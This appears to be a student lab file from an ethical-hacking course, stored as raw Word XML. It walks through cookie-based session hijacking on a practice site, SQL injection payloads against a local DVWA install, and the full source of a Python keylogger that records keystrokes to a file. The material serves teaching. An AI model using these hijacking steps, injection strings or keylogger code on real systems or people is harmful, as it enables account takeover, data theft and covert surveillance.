        <w:t xml:space="preserve">🔗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  <w:hyperlink r:id="rId100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https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="6057900" cy="1661160"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213250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17050" y="2949400"/>
                          <a:ext cx="6057900" cy="1661160"/>
                          <a:chOff x="2317050" y="2949400"/>
                          <a:chExt cx="6057900" cy="1661200"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2317050" y="2949420"/>
                            <a:ext cx="6057900" cy="1661160"/>
                            <a:chOff x="2317050" y="2949400"/>
                            <a:chExt cx="6057900" cy="1661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317050" y="2949400"/>
                              <a:ext cx="6057900" cy="1661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317050" y="2949420"/>
                              <a:ext cx="6057900" cy="1661160"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="6697345" cy="1844040"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="67" name="Shape 67"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="6697325" cy="18440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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="68" name="Shape 68"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId101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0" y="0"/>
                                <a:ext cx="3171825" cy="1844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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="69" name="Shape 69"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId102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3192780" y="15240"/>
                                <a:ext cx="3504565" cy="1798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057900" cy="1661160"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325010" name="image112.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image112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57900" cy="166116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right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After Adding both add-ons on the Chrome, Open Link in NEW TAB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Quattrocento Sans" w:cs="Quattrocento Sans" w:eastAsia="Quattrocento Sans" w:hAnsi="Quattrocento Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔗</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_17"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
              <w:color w:val="000000"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve"> → </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:hyperlink r:id="rId103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https://www.techpanda.org/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Use the following credentials to login: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(email - “admin@google.com”  |  password - “Password2010”)</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_18"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
              <w:color w:val="000000"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve"> → </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_19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“Remember Me” → Submit Button → Dashboard →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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450420" cy="1631020"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132504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0420" cy="163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4776411" cy="1564796"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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411" cy="1564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Now, go to the Cookie Editor add-on &amp; In PHPSESSID Copy Paste the ID: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660934" cy="1583327"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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6"/>
                    <a:srcRect b="44364" l="29381" r="1219" t="15817"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5660934" cy="1583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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_20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Now, Go to Tamper Data Add-ons &amp; Start it by Clicking “YES” →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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4390195" cy="2889257"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132504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0195" cy="2889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Now open the new tab -&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId10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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">www.techpanda.org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and append it with /index.php -&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId10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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">www.techpanda.org/index.php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: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718095" cy="2555591"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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8095" cy="2555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    Click on OK:</w:t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679079" cy="2488860"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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9079" cy="2488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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_21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Now, Paste the Copied Cookie after “PHPSESSID =” and Click “OK” →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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3257139" cy="2618867"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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139" cy="2618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Repeat the STEP 6 &amp; 7.  But, Append the URL with “/dashboard.php” and </w:t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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_22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Paste the Copied Cookie after “PHPSESSID = ” in Cookie &amp; Click “OK”  →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="5707380" cy="3055620"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213250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92300" y="2252175"/>
                          <a:ext cx="5707380" cy="3055620"/>
                          <a:chOff x="2492300" y="2252175"/>
                          <a:chExt cx="5707400" cy="3055650"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2492310" y="2252190"/>
                            <a:ext cx="5707380" cy="3055620"/>
                            <a:chOff x="2492300" y="2252175"/>
                            <a:chExt cx="5707400" cy="3055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492300" y="2252175"/>
                              <a:ext cx="5707400" cy="3055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492310" y="2252190"/>
                              <a:ext cx="5707380" cy="3055620"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="5352415" cy="2926080"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="72" name="Shape 72"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="5352400" cy="29260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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="73" name="Shape 73"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId113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0" y="0"/>
                                <a:ext cx="2007235" cy="29260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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="74" name="Shape 74"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId114">
                                <a:alphaModFix/>
                              </a:blip>
                              <a:srcRect b="0" l="0" r="0" t="0"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr>
                              <a:xfrm>
                                <a:off x="2057400" y="0"/>
                                <a:ext cx="3295015" cy="28727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07380" cy="3055620"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325011" name="image113.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image113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07380" cy="305562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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_23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color w:val="000000"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">After Clicking OK, you’ll see the logged dashboard without logging in →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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220345</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>179070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6059805" cy="1722120"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
            <wp:docPr id="212132505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5"/>
                    <a:srcRect b="0" l="1877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17221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Practical No. 11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Aim: -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Perform SQL injection attack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Pre-requisites:</w:t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Xampp: </w:t>
      </w:r>
      <w:hyperlink r:id="rId116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8"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.apachefriends.org/download.html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17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DVWA Zip: </w:t>
      </w:r>
      <w:hyperlink r:id="rId117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8"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sourceforge.net/projects/dvwa.mirror/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Steps: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Open the Xampp control panel and start the Apache and MySQL server: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405135" cy="2210357"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132505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35" cy="2210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Open Any Browser &amp; Paste Link in the Address Bar to check the working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(</w:t>
      </w:r>
      <w:hyperlink r:id="rId11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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost/dashboard/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):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825233" cy="2032129"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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5233" cy="2032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Go to “DVWA\config\config.php.dist” &amp; Rename File To “config.php”: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750242" cy="2504798"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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0242" cy="2504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Open the file with Notepad:</w:t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281906" cy="2201202"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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906" cy="2201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Now, Make Changes according to the $_DVWA[ 'db_user' ]     = ‘root’;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$_DVWA[ 'db_password' ] = ''; -&gt; Save it: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702916" cy="1339596"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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2916" cy="1339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Now copy the DVWA Folder and go to Xampp\phpMyAdmin and paste the folder there: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193904" cy="2912872"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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3904" cy="2912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Now, try running the “setup.php” file of DVWA by any favourite Browser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hyperlink r:id="rId12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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost/phpmyadmin/digininja-DVWA-947d5d3/setup.php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  ,then click on “Create / Reset Database”</w:t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5046962" cy="3117866"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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6962" cy="3117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134291" cy="2424419"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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291" cy="2424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Login using username = “admin” and password= “password” credentials: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5731510" cy="2049780"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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Now, Set the Security as “LOW” in DVWA Security Section-&gt; Submit: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030980" cy="2237448"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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2237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Click on SQL Injection and enter User ID as “1”: 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5048509" cy="2064486"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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064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Try User ID as (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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a ' or' '='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949255" cy="2696702"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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9255" cy="2696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Try User ID as (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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1*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):</w:t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3807372" cy="1620642"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132503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7372" cy="1620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Try User ID as (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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1= 1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):</w:t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5261989" cy="2271878"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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1989" cy="2271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Try User ID as (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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2#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5163391" cy="2206425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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3391" cy="220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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical No. 12</w:t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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim: -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Create a simple keylogger using python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Steps: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Open Command Prompt, Install pynput using “pip install pynput”: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5731510" cy="1927860"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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Create a Folder in DESKTOP &gt; Rename it as “EH”:</w:t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Go to “\Desktop\EH” &gt; Create 2 Files as “keylog.py” &amp; “key_log.txt”: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  <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4820083" cy="1692851"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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0083" cy="1692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Python Code (keylog.py):</w:t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from pynput.keyboard import Key, Listener</w:t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import logging</w:t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log_dir = r"C:\Users\Admin\Desktop\EH"</w:t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logging.basicConfig(filename=("key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')</w:t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def on_press(key):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logging.info(format(key))</w:t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with Listener(on_press=on_press) as listener:</w:t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   listener.join()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Run the code and type random keys -&gt; close the idle -&gt; check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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">key_log.txt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”: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4044276" cy="1879652"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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4276" cy="1879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</w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5249882" cy="3019293"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132505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9882" cy="3019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39" w:type="default"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="3402" w:left="1440" w:right="1440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 Unicode MS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Tahoma">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId4" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId5" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Quattrocento Sans">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId6" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId7" w:subsetted="0"/>
    <w:embedItalic w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId8" w:subsetted="0"/>
    <w:embedBoldItalic w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId9" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Noto Sans Symbols">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId10" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId11" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Cambria Math">
    <w:embedRegular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D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</w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="1"/>
        <w:color w:val="000000"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Roll No.:</w:t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cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman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36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36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36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36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13"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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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8B535D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NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="008B535D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 w:val="1"/>
    <w:rsid w:val="008B535D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 w:val="1"/>
    <w:rsid w:val="008B535D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B535D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00997268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97268"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention1" w:customStyle="1">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00A339A5"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:color="auto" w:fill="e1dfdd" w:val="clear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04276C"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:color="auto" w:fill="e1dfdd" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00A8735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 w:val="1"/>
    <w:rsid w:val="00B00E44"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="1"/>
    </w:p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BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00DB6E4C"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:cs="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="en-US" w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BodyTextChar" w:customStyle="1">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00DB6E4C"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:cs="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="en-US" w:val="en-US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eb.archive.org/web/20190601183155/http://www.oxid.it/cain.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.techpanda.org/index.php" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.techpanda.org" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpg"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techpanda.org/" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.winpcap.org/install/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20190601183155/http://www.oxid.it/cain.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.winpcap.org/install/" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/phpmyadmin/digininja-DVWA-947d5d3/setup.php" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ckthakurcollege.net/" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-ff-quantum/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/dvwa.mirror/" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apachefriends.org/download.html" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/dashboard/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.flipkart.com/" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.flipkart.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId19" 